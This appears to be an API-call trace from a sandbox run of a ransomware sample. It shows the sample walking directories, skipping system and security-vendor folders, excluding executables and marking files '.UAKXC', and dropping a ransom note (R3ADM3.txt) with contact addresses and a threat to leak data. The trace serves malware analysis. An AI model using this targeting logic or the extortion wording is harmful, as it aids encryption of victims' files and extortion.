0xed3498 [0137.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0137.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0137.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecba8 [0137.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd5d0 [0137.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.331] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0137.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0137.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0137.331] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.332] Sleep (dwMilliseconds=0x32) [0137.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0137.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0137.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0137.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0137.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0137.390] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\R3ADM3.txt" (normalized: "c:\\perflogs\\admin\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.391] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.391] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.392] CloseHandle (hObject=0x6c4) returned 1 [0137.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0137.393] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0137.393] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x579b1d50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x579b1d50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.393] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x579b1d50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x579b1d50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.393] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x579b1d50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x579b1d50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x579b1d50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.393] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.393] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.393] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.394] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x579b1d50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x579b1d50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x579b1d50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0137.394] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3fc8 | out: hHeap=0xea0000) returned 1 [0137.394] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0137.394] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.394] Sleep (dwMilliseconds=0x32) [0137.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0137.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebc30 [0137.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc30 | out: hHeap=0xea0000) returned 1 [0137.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0137.453] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\R3ADM3.txt" (normalized: "c:\\program files\\common files\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.454] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.454] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.455] CloseHandle (hObject=0x6c4) returned 1 [0137.455] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.455] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.455] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57a4a2d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57a4a2d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.456] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.456] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57a4a2d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57a4a2d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.456] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.456] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0137.456] lstrcmpW (lpString1="DESIGNER", lpString2=".") returned 1 [0137.456] lstrcmpW (lpString1="DESIGNER", lpString2="..") returned 1 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="tmp") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="winnt") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="temp") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="thumb") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="$Recycle.Bin") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="System Volume Information") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="Boot") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="Windows") returned 0x0 [0137.456] StrStrIW (lpFirst="DESIGNER", lpSrch="Trend Micro") returned 0x0 [0137.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0137.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.457] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.457] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.457] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0137.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0137.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0137.457] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.457] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7cbba10, ftCreationTime.dwHighDateTime=0x1d58df8, ftLastAccessTime.dwLowDateTime=0xa18d1360, ftLastAccessTime.dwHighDateTime=0x1d59613, ftLastWriteTime.dwLowDateTime=0xa18d1360, ftLastWriteTime.dwHighDateTime=0x1d59613, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="isspos.exe", cAlternateFileName="")) returned 1 [0137.457] lstrcmpW (lpString1="isspos.exe", lpString2=".") returned 1 [0137.457] lstrcmpW (lpString1="isspos.exe", lpString2="..") returned 1 [0137.457] StrStrIW (lpFirst="isspos.exe", lpSrch=".UAKXC") returned 0x0 [0137.457] StrStrIW (lpFirst="isspos.exe", lpSrch=".exe") returned=".exe" [0137.457] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0137.457] lstrcmpW (lpString1="Microsoft Shared", lpString2=".") returned 1 [0137.457] lstrcmpW (lpString1="Microsoft Shared", lpString2="..") returned 1 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="tmp") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="winnt") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="temp") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="thumb") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="$Recycle.Bin") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="System Volume Information") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="Boot") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="Windows") returned 0x0 [0137.457] StrStrIW (lpFirst="Microsoft Shared", lpSrch="Trend Micro") returned 0x0 [0137.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.458] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.458] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.458] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbd0 [0137.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed8ec8 [0137.458] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.458] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57a4a2d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57a4a2d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57a4a2d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.458] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.458] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.458] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.458] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0137.458] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0137.458] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0137.458] StrStrIW (lpFirst="Services", lpSrch="tmp") returned 0x0 [0137.458] StrStrIW (lpFirst="Services", lpSrch="winnt") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="temp") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="thumb") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="$Recycle.Bin") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="System Volume Information") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="Boot") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="Windows") returned 0x0 [0137.459] StrStrIW (lpFirst="Services", lpSrch="Trend Micro") returned 0x0 [0137.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbf8 [0137.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.459] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.459] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.459] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbf8 | out: hHeap=0xea0000) returned 1 [0137.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbf8 [0137.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0137.459] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.459] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0137.459] lstrcmpW (lpString1="SpeechEngines", lpString2=".") returned 1 [0137.459] lstrcmpW (lpString1="SpeechEngines", lpString2="..") returned 1 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="tmp") returned 0x0 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="winnt") returned 0x0 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="temp") returned 0x0 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="thumb") returned 0x0 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="$Recycle.Bin") returned 0x0 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.459] StrStrIW (lpFirst="SpeechEngines", lpSrch="System Volume Information") returned 0x0 [0137.460] StrStrIW (lpFirst="SpeechEngines", lpSrch="Boot") returned 0x0 [0137.460] StrStrIW (lpFirst="SpeechEngines", lpSrch="Windows") returned 0x0 [0137.460] StrStrIW (lpFirst="SpeechEngines", lpSrch="Trend Micro") returned 0x0 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc20 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.460] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.460] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.460] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc20 | out: hHeap=0xea0000) returned 1 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc20 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xee3c78 [0137.460] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.460] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0137.460] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0137.460] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0137.460] StrStrIW (lpFirst="System", lpSrch="tmp") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="winnt") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="temp") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="thumb") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="$Recycle.Bin") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="System Volume Information") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="Boot") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="Windows") returned 0x0 [0137.460] StrStrIW (lpFirst="System", lpSrch="Trend Micro") returned 0x0 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.460] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.461] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc48 [0137.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0137.461] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.461] FindNextFileW 